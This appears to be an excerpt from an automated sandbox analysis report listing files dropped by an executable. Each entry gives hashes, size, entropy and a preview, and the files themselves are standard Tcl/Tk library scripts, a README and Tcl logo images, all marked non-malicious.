                                                                                                                                                                                                                              SSDEEP:96:qFR55woFFEciKwKClFEOTIhDHWyzaoj9zza7v0J7:qL55jiKwKCzTIhDbzaojhSG7
                                                                                                                                                                                                                              MD5:B2B3AA971D42FDBF92F13B45111EE1D3
                                                                                                                                                                                                                              SHA1:A74F2C2707463D6E209D0E0C96D75083AC6920A5
                                                                                                                                                                                                                              SHA-256:1C977052C1D8293CC5FE4198A538BECA9BC821AF85E76E4EEFBFB75B33CE8BED
                                                                                                                                                                                                                              SHA-512:146F658DA3E6E9176FA51C9836D7C1DCFC14E148A26B224155F6493C195A7FB20C2DC4EE21994E5A193B8DA8561C75374E830304F94F0C844E52AD829F6810D5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# dialog.tcl --..#..# This file defines the procedure tk_dialog, which creates a dialog..# box containing a bitmap, a message, and one or more buttons...#..# Copyright (c) 1992-1993 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#..# ::tk_dialog:..#..# This procedure displays a dialog box, waits for a button in the dialog..# to be invoked, then returns the index of the selected button. If the..# dialog somehow gets destroyed, -1 is returned...#..# Arguments:..# w -..Window to use for dialog top-level...# title -.Title to display in dialog's decorative frame...# text -.Message to display in dialog...# bitmap -.Bitmap to display in dialog (empty string means none)...# default -.Index of button that is to display the default ring..#..(-1 means none)...# args -.One or more strings to display in buttons
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18440
                                                                                                                                                                                                                              Entropy (8bit):4.982597499983157
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:mDfyPIlBk3yrt8qLjtpa+qh+rA4rsWRWrrMUtCPnkKYNlPp64ZnCD:mDfyPIlBk3yJ8mtpaplcp6o
                                                                                                                                                                                                                              MD5:007F42FBCDC57652AC8381F11AF7FB67
                                                                                                                                                                                                                              SHA1:1BB1B0FCAD6F5633D1BEB8903112F180B1C4BA7F
                                                                                                                                                                                                                              SHA-256:65BA33A1E0B21E8E074780A51189CEE6FD9926C85273E9E7633987FC212A17B2
                                                                                                                                                                                                                              SHA-512:A27089719ADAFC48B5ABB905E40D0C6A0A2507526223D72C1CFF36AB7C15362C6F0B8EE5775181BA1730852802AFA64631EE3720E624B630E3274BFB32F6A59A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# entry.tcl --..#..# This file defines the default bindings for Tk entry widgets and provides..# procedures that help in implementing those bindings...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# Elements of tk::Priv that are used in this file:..#..# afterId -..If non-null, it means that auto-scanning is underway..#...and it gives the "after" id for the next auto-scan..#...command to be executed...# mouseMoved -..Non-zero means the mouse has moved a significant..#...amount since the button went down (so, for example,..#...start dragging out a selection)...# pressX -..X-coordinate at which the mouse button was pressed...# selectMode -..The style of selection currently underway:..#...char, word
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5035
                                                                                                                                                                                                                              Entropy (8bit):4.819523401259934
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:J3MRZZ7HWb/6OgRKjtS6Mn9GRZZ7HWb2Y6aO6R5nh76SMoB2kd82KtTpsi2D0DSn:CRZdPul1RZdFaRf0XoB2gZKZpsi2pn
                                                                                                                                                                                                                              MD5:63B219BE9AFF1DE7DE2BAF0E941CAE38
                                                                                                                                                                                                                              SHA1:A2FEBB31380E12FF01E6F641FE8B4F815941462F
                                                                                                                                                                                                                              SHA-256:8872F236D7E824AEC0ACD4BACC00FDD7EC9BC5534814ECF2160610C10647B7C5
                                                                                                                                                                                                                              SHA-512:057700F8FDE4B7C3D7AB7CEFD6C531060BF2B1B3B727CAD6A37ECD42EBC557765D94B83ADD438BD5AFA1F6F919D80AE755A8D98918981167B871F31AD42FDF5E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# focus.tcl --..#..# This file defines several procedures for managing the input..# focus...#..# Copyright (c) 1994-1995 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# ::tk_focusNext --..# This procedure returns the name of the next window after "w" in..# "focus order" (the window that should receive the focus next if..# Tab is typed in w). "Next" is defined by a pre-order search..# of a top-level and its non-top-level descendants, with the stacking..# order determining the order of siblings. The "-takefocus" options..# on windows determine whether or not they should be skipped...#..# Arguments:..# w -..Name of a window.....proc ::tk_focusNext w {.. set cur $w.. while {1} {.....# Descend to just before the first child of the current widget......set parent $cur...set children [winfo children $cur]...set i -1.....# Look for the next sibling that isn't a top-leve
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18232
                                                                                                                                                                                                                              Entropy (8bit):4.723225284452692
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:NoRqdguMCeor/4VxgU80zNxWHKVozN5EaKdhsbyM:NoRqdguMCeor/4VxgUnzN0KSDEk
                                                                                                                                                                                                                              MD5:CFA99C2D3F02AE6538809774699A9CE7
                                                                                                                                                                                                                              SHA1:DADB7B3D1D9531710BA7D3025CE18F6F8149F280
                                                                                                                                                                                                                              SHA-256:4EE521F4980A5056077005B748717D91CB6B17342CDD20135962AB92A665B580
                                                                                                                                                                                                                              SHA-512:DCF54AAEA439C986AE28CEC0241F204BB5001DE4E98C2E7A9C282F9E47747AD62E9B2CF6FBBAC068BF1F1BB0AAC866F85476E9EE79935CE1E3656F122C2D002D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# fontchooser.tcl -..#..#.A themeable Tk font selection dialog. See TIP #324...#..# Copyright (C) 2008 Keith Vetter..# Copyright (C) 2008 Pat Thoyts <patthoyts@users.sourceforge.net>..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....namespace eval ::tk::fontchooser {.. variable S.... set S(W) .__tk__fontchooser.. set S(fonts) [lsort -dictionary -unique [font families]].. set S(styles) [list \.. [::msgcat::mc Regular] \.. [::msgcat::mc Italic] \.. [::msgcat::mc Bold] \.. [::msgcat::mc {Bold Italic}] \.. ].. set S(sizes) {8 9 10 11 12 14 16 18 20 22 24 26 28 36 48 72}.. set S(strike) 0.. set S(under) 0.. set S(first) 1.. set S(-parent) ... set S(-title) {}.. set S(-command) "".. set S(-font) TkDefaultFont.. set S(bad) [list ]..}....proc ::tk::fontchooser::Canonical {} {.. variable S.... foreach style $S(styles
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):17565
                                                                                                                                                                                                                              Entropy (8bit):4.959816621842895
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:FNP8nO9Wo8k5NfQH8EsOy8WMdbffNCvHshPOw7jW:FNf8uNfQH89Z8WMdz1vDW
                                                                                                                                                                                                                              MD5:FDB839B85C4CEB34DEC04E0EBD6A3C96
                                                                                                                                                                                                                              SHA1:0FD8981093CC6ED9927D1DDE708FECE84B9C5E6F
                                                                                                                                                                                                                              SHA-256:07812124D27E47621AF74FDB90C777D3219B02F657FC2F97F606C69EF9468A01
                                                                                                                                                                                                                              SHA-512:E65616B3F6BDC3910FC90E9710426370AA4B0A0D9EB6289871B9C30A98A2F2B5CC1E471B63203210AAE89120F20F164A33E01DA45BCCCCCEC7BFC1CCFD70FAC7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# iconlist.tcl..#..#.Implements the icon-list megawidget used in the "Tk" standard file..#.selection dialog boxes...#..# Copyright (c) 1994-1998 Sun Microsystems, Inc...# Copyright (c) 2009 Donal K. Fellows..#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#..# API Summary:..#.tk::IconList <path> ?<option> <value>? .....#.<path> add <imageName> <itemList>..#.<path> cget <option>..#.<path> configure ?<option>? ?<value>? .....#.<path> deleteall..#.<path> destroy..#.<path> get <itemIndex>..#.<path> index <index>..#.<path> invoke..#.<path> see <index>..#.<path> selection anchor ?<int>?..#.<path> selection clear <first> ?<last>?..#.<path> selection get..#.<path> selection includes <item>..#.<path> selection set <first> ?<last>?.....package require Tk....::tk::Megawidget create ::tk::IconList ::tk::FocusableWidget {.. variable w canvas sbar accel accelCB fill font index \...itemList itemsPerColumn list
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11037
                                                                                                                                                                                                                              Entropy (8bit):6.048349526382653
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:0nEPytJLl1S47T3YqN5/vkJpnhXqBB4aw2rqZiygTtYTpOq/pc75Mk:xqLz7F5KTqBBLuZ1gTSsqhk
                                                                                                                                                                                                                              MD5:995A0A8F7D0861C268AEAD5FC95A42EA
                                                                                                                                                                                                                              SHA1:21E121CF85E1C4984454237A646E58EC3C725A72
                                                                                                                                                                                                                              SHA-256:1264940E62B9A37967925418E9D0DC0BEFD369E8C181B9BAB3D1607E3CC14B85
                                                                                                                                                                                                                              SHA-512:DB7F5E0BC7D5C5F750E396E645F50A3E0CDE61C9E687ADD0A40D0C1AA304DDFBCEEB9F33AD201560C6E2B051F2EDED07B41C43D00F14EE435CDEEE73B56B93C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# icons.tcl --..#..#.A set of stock icons for use in Tk dialogs. The icons used here..#.were provided by the Tango Desktop project which provides a..#.unified set of high quality icons licensed under the..#.Creative Commons Attribution Share-Alike license..#.(https://creativecommons.org/licenses/by-sa/3.0/)..#..#.See http://tango.freedesktop.org/Tango_Desktop_Project..#..# Copyright (c) 2009 Pat Thoyts <patthoyts@users.sourceforge.net>....namespace eval ::tk::icons {}....image create photo ::tk::icons::warning -data {.. iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAABHNCSVQICAgIfAhkiAAABSZJREFU.. WIXll1toVEcYgL+Zc87u2Yu7MYmrWRuTJuvdiMuqiJd4yYKXgMQKVkSjFR80kFIVJfWCWlvpg4h9.. 8sXGWGof8iKNICYSo6JgkCBEJRG8ImYThNrNxmaTeM7pQ5IlJkabi0/9YZhhZv7///4z/8zPgf+7.. KCNRLgdlJijXwRyuDTlcxV9hbzv8nQmxMjg+XDtiOEplkG9PSfkztGmTgmFQd+FCVzwa3fYN/PHZ.. AcpBaReicW5xcbb64IEQqko8Lc26d/58cxS+/BY6hmJvyEfQBoUpwWCmW1FErKaGWHU13uRk4QkE.. UtxQNFR7QwIoB4eiKD9PWbVKbb10CZmaCqmpxCormRYO26QQx85B0mcD+AeK0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):329
                                                                                                                                                                                                                              Entropy (8bit):4.3973643486226655
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:nVxpJFBmHdeA1xNZgk0dIf3Ju4dFi6/XWrWhr3W7FxmVFraazmVAJFKyVQR7icr8:nj5Bqf1fZgp6A4FDG6dm7FUGAJVVMRmn
                                                                                                                                                                                                                              MD5:921245A21F7E783997DC7B859AF1B65B
                                                                                                                                                                                                                              SHA1:2EFE3C8F70CF18621006890BF21CC097770D140D
                                                                                                                                                                                                                              SHA-256:C6DB098EBD8A622164D37D4AB0A8C205DB1A83AC3065D5CDE3CB5FB61925D283
                                                                                                                                                                                                                              SHA-512:CAD823FF3D13A64C00825961E75B5133690556FB1F622834F8B1DF316A9E75BABB63B9F5148DAE7B1391123B4C8D55B4B8B2EB6F8E6E1DA9DE02A5BD7AC0FD6F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:README - images directory....This directory includes images for the Tcl Logo and the Tcl Powered..Logo. Please feel free to use the Tcl Powered Logo on any of your..products that employ the use of Tcl or Tk. The Tcl logo may also be..used to promote Tcl in your product documentation, web site or other..places you so desire...
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PostScript document text conforming DSC level 3.0, type EPS
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):34991
                                                                                                                                                                                                                              Entropy (8bit):5.248845410801251
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:0YrY6a0v4uIqYMEKjodQKOfRXMLcSqDGpfTKFVm3AsanMEDzzBHWzaw7XUbTJjoB:0YrY6aeIqYMEKjouzfRXMLcSqDGpfTKo
                                                                                                                                                                                                                              MD5:23C4EDED40DEC065F99E6653AEE1BB31
                                                                                                                                                                                                                              SHA1:3175E261BE198731DEDB07264CCB84C8DEDF7967
                                                                                                                                                                                                                              SHA-256:76207D8DFDE189A29DC0E76ADB7EAAA606B96BC6C1C831F34D1C85B1C5B51DD3
                                                                                                                                                                                                                              SHA-512:BA139A64BE72BB681040924C4294E2726BA5AB243E805E60A854D2D23E154705E2431D1AB2DE732BFA393747FD30D8A5C913895CBE1463DBF50CC23CAE5B0454
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:%!PS-Adobe-3.0 EPSF-3.0..%%Creator: Adobe Illustrator(TM) 5.5..%%For: (Bud Northern) (Mark Anderson Design)..%%Title: (TCL/TK LOGO.ILLUS)..%%CreationDate: (8/1/96) (4:58 PM)..%%BoundingBox: 251 331 371 512..%%HiResBoundingBox: 251.3386 331.5616 370.5213 511.775..%%DocumentProcessColors: Cyan Magenta Yellow..%%DocumentSuppliedResources: procset Adobe_level2_AI5 1.0 0..%%+ procset Adobe_IllustratorA_AI5 1.0 0..%AI5_FileFormat 1.2..%AI3_ColorUsage: Color..%%DocumentCustomColors: (TCL RED)..%%CMYKCustomColor: 0 0.45 1 0 (Orange)..%%+ 0 0.25 1 0 (Orange Yellow)..%%+ 0 0.79 0.91 0 (TCL RED)..%AI3_TemplateBox: 306 396 306 396..%AI3_TileBox: 12 12 600 780..%AI3_DocumentPreview: Macintosh_ColorPic..%AI5_ArtSize: 612 792..%AI5_RulerUnits: 0..%AI5_ArtFlags: 1 0 0 1 0 0 1 1 0..%AI5_TargetResolution: 800..%AI5_NumLayers: 1..%AI5_OpenToView: 90 576 2 938 673 18 1 1 2 40..%AI5_OpenViewLayers: 7..%%EndComments..%%BeginProlog..%%BeginResource: procset Adobe_level2_AI5 1.0 0..%%Title: (Adobe Illustrator
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 68 x 100
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2341
                                                                                                                                                                                                                              Entropy (8bit):6.9734417899888665
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:qF/mIXn3l7+ejbL/4nZEsKPKer1OPQqVRqJbPpRRKOv/UVO47f:81nHL4T0KorxvRKkc847f
                                                                                                                                                                                                                              MD5:FF04B357B7AB0A8B573C10C6DA945D6A
                                                                                                                                                                                                                              SHA1:BCB73D8AF2628463A1B955581999C77F09F805B8
                                                                                                                                                                                                                              SHA-256:72F6B34D3C8F424FF0A290A793FCFBF34FD5630A916CD02E0A5DDA0144B5957F
                                                                                                                                                                                                                              SHA-512:10DFE631C5FC24CF239D817EEFA14329946E26ED6BCFC1B517E2F9AF81807977428BA2539AAA653A89A372257D494E8136FD6ABBC4F727E6B199400DE05ACCD5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF89aD.d...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....D.d........H......*\...z..Ht@Q...92.p...z.$.@@.E..u.Y.2..0c..q.cB.,[..... ..1..qbM.2~*].....s...S.@.L.j..#..\......h..........].D(..m......@.Z....oO...3=.c...G".(..pL...q]..%....[...#...+...X.h....^.....
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 43 x 64
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1670
                                                                                                                                                                                                                              Entropy (8bit):6.326462043862671
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:PF/mIXn3l7+ejbL/4xsgq4sNC6JYp6s/pmp76F:/1nHL404raM/op2
                                                                                                                                                                                                                              MD5:B226CC3DA70AAB2EBB8DFFD0C953933D
                                                                                                                                                                                                                              SHA1:EA52219A37A140FD98AEA66EA54685DD8158D9B1
                                                                                                                                                                                                                              SHA-256:138C240382304F350383B02ED56C69103A9431C0544EB1EC5DCD7DEC7A555DD9
                                                                                                                                                                                                                              SHA-512:3D043F41B887D54CCADBF9E40E48D7FFF99B02B6FAF6B1DD0C6C6FEF0F8A17630252D371DE3C60D3EFBA80A974A0670AF3747E634C59BDFBC78544D878D498D4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF89a+.@...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....+.@........H. .z..(tp......@...92....#. A.......C.\.%...)Z..1a.8s..W/..@....3..C...y$.GW.....5.FU..j..;.F(Pc+W.-..X.D-[.*g....F..`.:mkT...Lw...A/.....u.7p..a..9P.....q2..Xg..G....3}AKv.\.d..yL.>..1.#
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 354 x 520
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11000
                                                                                                                                                                                                                              Entropy (8bit):7.88559092427108
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:d+nY6zludc/We/yXy9JHBUoIMSapQdrGlapzmyNMK1vbXkgMmgFW/KxIq3NhZe:YnY6p4c/OCHyowaGUaCcMK1vbXNwFW/l
                                                                                                                                                                                                                              MD5:45D9B00C4CF82CC53723B00D876B5E7E
                                                                                                                                                                                                                              SHA1:DDD10E798AF209EFCE022E97448E5EE11CEB5621
                                                                                                                                                                                                                              SHA-256:0F404764D07A6AE2EF9E1E0E8EAAC278B7D488D61CF1C084146F2F33B485F2ED
                                                                                                                                                                                                                              SHA-512:6E89DACF2077E1307DA05C16EF8FDE26E92566086346085BE10A7FD88658B9CDC87A3EC4D17504AF57D5967861B1652FA476B2DDD4D9C6BCFED9C60BB2B03B6F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF89ab.................f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....b..........H......*\....#J.H....3j.... '.;p....(.8X..^.0c.I...z8O.\.....:....$..Fu<8`...P.>%I.gO.C.h-..+.`....@..h....dJ.?...K...H.,U.._.#...g..[.*^.x.....J.L.!.'........=+eZ..i..ynF.8...].y|..m.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 87a, 120 x 181
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3889
                                                                                                                                                                                                                              Entropy (8bit):7.425138719078912
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:9qqbIh+cE4C8ric/jxK5mxsFBu3/0GIJ6Qap1Y5uMiR8pw5rB/SgijDb+TOh:hy+mnZ7xK5IsTwDQmkdiiG5rB/BE+6h
                                                                                                                                                                                                                              MD5:BD12B645A9B0036A9C24298CD7A81E5A
                                                                                                                                                                                                                              SHA1:13488E4F28676F1E0CE383F80D13510F07198B99
                                                                                                                                                                                                                              SHA-256:4D0BD3228AB4CC3E5159F4337BE969EC7B7334E265C99B7633E3DAF3C3FCFB62
                                                                                                                                                                                                                              SHA-512:F62C996857CA6AD28C9C938E0F12106E0DF5A20D1B4B0B0D17F6294A112359BA82268961F2A054BD040B5FE4057F712206D02F2E668675BBCF6DA59A4DA0A1BB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF87ax............................................................................z.....{..o.....m..b...`{.X....vy...hk.Um.N...I`.D..Z^.LP.?R.;!....?C.5C.3#.l..,6.*&.15...`..#(.If.y.....l...._..#/...Hm.>_.y..4R.k..#6..._......w..*K.^.."<.....G{.w..3_."C.Q..F....v..!K...v.2m.)_.[..!R.u.1t.g..)f. X.O..E..1z.g. _.Z..D..:..0..Z.. f.D..0..'z..m.N..C../.z.svC.q/.m.ze7.\..P..I..1%.,...............................................................................................................................................................................................................................................................................................................................................................................................,....x..........H.......D..!...7.PAQ...._l8.... C.<.a...*.x....0q.. ..M.%.<.HBe.@.....Q..7..XC..P..<z3..X...P.jA.%'@.J.lV.......R.,..+....t....7h.....(..a...+^.'..7..L.....V...s..$....a.....8`.9..}K......
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PostScript document text conforming DSC level 3.0, type EPS
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):29706
                                                                                                                                                                                                                              Entropy (8bit):5.33387357427899
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:0warY6a0v4uIqYMEKjodQKOfRtMLcSqDGpf88KFVmlhEtOI/eE7U0a1:03rY6aeIqYMEKjouzfRtMLcSqDGpfbKc
                                                                                                                                                                                                                              MD5:4AE11820D4D592D02CDE458E6F8CE518
                                                                                                                                                                                                                              SHA1:A2E8D3D6191B336D43E48A65C3AE6485B07D93C6
                                                                                                                                                                                                                              SHA-256:87FD9E46DBB5F2BF1529AFB411182C9FB9C58E23D830C66A233AF0C256BB8EFF
                                                                                                                                                                                                                              SHA-512:E0AD4ED570D414BF00931B0F5BBB61FEF981ABDB22ECC42F8E9841905D38874CDFE38F22EDB17ACD0F7539B2932F9C4A865FA73A49BB1458CE05EE10A78BE357
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:%!PS-Adobe-3.0 EPSF-3.0..%%Creator: Adobe Illustrator(TM) 5.5..%%For: (Bud Northern) (Mark Anderson Design)..%%Title: (TCL PWRD LOGO.ILLUS)..%%CreationDate: (8/1/96) (4:59 PM)..%%BoundingBox: 242 302 377 513..%%HiResBoundingBox: 242.0523 302.5199 376.3322 512.5323..%%DocumentProcessColors: Cyan Magenta Yellow..%%DocumentSuppliedResources: procset Adobe_level2_AI5 1.0 0..%%+ procset Adobe_IllustratorA_AI5 1.0 0..%AI5_FileFormat 1.2..%AI3_ColorUsage: Color..%%CMYKCustomColor: 0 0.45 1 0 (Orange)..%%+ 0 0.25 1 0 (Orange Yellow)..%%+ 0 0.79 0.91 0 (PANTONE Warm Red CV)..%%+ 0 0.79 0.91 0 (TCL RED)..%AI3_TemplateBox: 306 396 306 396..%AI3_TileBox: 12 12 600 780..%AI3_DocumentPreview: Macintosh_ColorPic..%AI5_ArtSize: 612 792..%AI5_RulerUnits: 0..%AI5_ArtFlags: 1 0 0 1 0 0 1 1 0..%AI5_TargetResolution: 800..%AI5_NumLayers: 1..%AI5_OpenToView: 102 564 2 938 673 18 1 1 2 40..%AI5_OpenViewLayers: 7..%%EndComments..%%BeginProlog..%%BeginResource: procset Adobe_level2_AI5 1.0 0..%%Title: (Adobe I
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 64 x 100
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1615
                                                                                                                                                                                                                              Entropy (8bit):7.461273815456419
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:aE45BzojC3r1WAQ+HT2gAdKhPFZ/ObchgB8:V5Gb1WN+yfcObmgW
                                                                                                                                                                                                                              MD5:DBFAE61191B9FADD4041F4637963D84F
                                                                                                                                                                                                                              SHA1:BD971E71AE805C2C2E51DD544D006E92363B6C0C
                                                                                                                                                                                                                              SHA-256:BCC0E6458249433E8CBA6C58122B7C0EFA9557CBC8FB5F9392EED5D2579FC70B
                                                                                                                                                                                                                              SHA-512:ACEAD81CC1102284ED7D9187398304F21B8287019EB98B0C4EC7398DD8B5BA8E7D19CAA891AA9E7C22017B73D734110096C8A7B41A070191223B5543C39E87AF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
